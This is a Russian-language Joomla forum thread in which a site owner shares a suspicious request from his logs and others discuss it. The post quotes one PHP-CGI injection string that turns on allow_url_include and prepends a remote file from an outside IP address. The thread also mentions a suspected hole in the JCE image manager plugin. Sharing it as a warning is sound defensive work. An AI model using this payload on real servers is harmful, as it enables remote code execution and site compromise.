Основной курс по Joomla
0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 422 Просмотров
*

saharin88

  • Давно я тут
  • ****
  • 246
  • 18
  • joom.work
Школьники атакуют
« : 18.06.2016, 13:35:13 »
Заметил сегодня вот такой запрос
?-d allow_url_include=On+-d auto_prepend_file=http://146.0.79.140/x.txt
Решил поделится с сообществом :)
Кстати перед єтим проверял есть стоит ли у меня JCE плагин imagemeneger, так что будте внимательны, видимо там есть дыра...
« Последнее редактирование: 18.06.2016, 13:43:12 от saharin88 »
*

winstrool

  • Завсегдатай
  • *****
  • 758
  • 39
  • Свободен для работы
Re: Школьники атакуют
« Ответ #1 : 18.06.2016, 13:52:32 »
А как работает этот запрос?
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

saharin88

  • Давно я тут
  • ****
  • 246
  • 18
  • joom.work
Re: Школьники атакуют
« Ответ #2 : 18.06.2016, 14:14:16 »
никак, а вообще директива allow_url_include позволяет загружать файлы с удаленного сервера
*

winstrool

  • Завсегдатай
  • *****
  • 758
  • 39
  • Свободен для работы
Re: Школьники атакуют
« Ответ #3 : 18.06.2016, 14:17:57 »
если никак, то польза от данного сообщения?
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

saharin88

  • Давно я тут
  • ****
  • 246
  • 18
  • joom.work
Re: Школьники атакуют
« Ответ #4 : 18.06.2016, 14:20:51 »
если никак, то польза от данного сообщения?
зацепило? ))
*

winstrool

  • Завсегдатай
  • *****
  • 758
  • 39
  • Свободен для работы
Re: Школьники атакуют
« Ответ #5 : 18.06.2016, 14:42:06 »
зацепило? ))
просто хочется логику понять
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

flyingspook

  • Moderator
  • *****
  • 3610
  • 236
Re: Школьники атакуют
« Ответ #6 : 21.06.2016, 12:58:45 »
если никак, то польза от данного сообщения?
нету
просто хочется логику понять
ни какой

Запрос от бота и файла название более 2-3 лет как одно и тоже  ^-^
*

saharin88

  • Давно я тут
  • ****
  • 246
  • 18
  • joom.work
Re: Школьники атакуют
« Ответ #7 : 21.06.2016, 13:17:41 »
нетуни какой

Запрос от бота и файла название более 2-3 лет как одно и тоже  ^-^

да, по поводу imagemeneger еще писал